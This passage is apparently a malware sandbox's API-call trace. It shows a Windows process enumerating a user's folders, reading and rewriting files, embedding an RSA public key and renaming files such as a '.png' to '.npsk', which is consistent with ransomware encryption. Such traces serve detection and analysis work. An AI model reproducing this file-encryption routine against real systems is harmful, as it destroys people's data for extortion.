[0215.790] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.791] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.791] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.791] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.791] GetLastError () returned 0x0 [0215.791] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.791] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.791] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.791] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.791] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.792] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.792] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x146d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.792] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.793] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.793] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.793] CloseHandle (hObject=0x61c) returned 1 [0215.795] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ywKsook.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ywksook.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ywKsook.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ywksook.png.npsk")) returned 1 [0215.797] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c82060, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0xff9ba470, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0xff9ba470, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x146d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywKsook.png", cAlternateFileName="")) returned 0 [0215.797] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.797] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.798] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.798] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0215.798] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.798] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.798] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.798] PathFindFileNameW (pszPath="") returned="" [0215.798] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c82060, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0xff9ba470, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0xff9ba470, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x146d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywKsook.png", cAlternateFileName="")) returned 0xffffffff [0215.798] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.798] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.798] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0215.798] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.799] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.799] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.799] PathFindFileNameW (pszPath="") returned="" [0215.799] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c82060, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0xff9ba470, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0xff9ba470, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x146d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywKsook.png", cAlternateFileName="")) returned 0xffffffff [0215.799] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.799] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.799] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0215.799] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.799] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.799] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.799] PathFindFileNameW (pszPath="") returned="" [0215.799] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.799] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.800] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.800] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0215.800] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0215.800] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.800] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.800] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0215.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.800] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.800] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.800] PathFindFileNameW (pszPath="") returned="" [0215.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.801] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.801] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.801] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0215.801] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0215.801] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0215.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0215.801] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0215.801] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0215.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0215.801] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0215.801] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.802] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.802] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0215.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.802] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.802] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.802] PathFindFileNameW (pszPath="") returned="" [0215.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0215.802] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.802] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0215.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.802] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.802] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.803] PathFindFileNameW (pszPath="") returned="" [0215.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0215.803] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.803] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.803] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0215.803] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.803] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.803] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.803] PathFindFileNameW (pszPath="") returned="" [0215.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0215.803] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.803] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0215.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.804] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.804] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.804] PathFindFileNameW (pszPath="") returned="" [0215.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9bcf700, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9bcf700, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.804] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9bcf700, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9bcf700, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.804] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c062190, ftCreationTime.dwHighDateTime=0x1d5e4c7, ftLastAccessTime.dwLowDateTime=0xd87f8030, ftLastAccessTime.dwHighDateTime=0x1d5e4d1, ftLastWriteTime.dwLowDateTime=0xd87f8030, ftLastWriteTime.dwHighDateTime=0x1d5e4d1, nFileSizeHigh=0x0, nFileSizeLow=0xbfb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-xuO.avi", cAlternateFileName="")) returned 1 [0215.804] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-xuO.avi") returned=".avi" [0215.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-xuO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-xuo.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.805] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=49080) returned 1 [0215.805] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.807] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xbf92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.808] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.809] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xbfb8, lpOverlapped=0x0) returned 1 [0215.810] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.811] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.812] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.812] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.812] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.812] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.812] GetLastError () returned 0x0 [0215.812] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.812] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.812] UuidCreate (in: 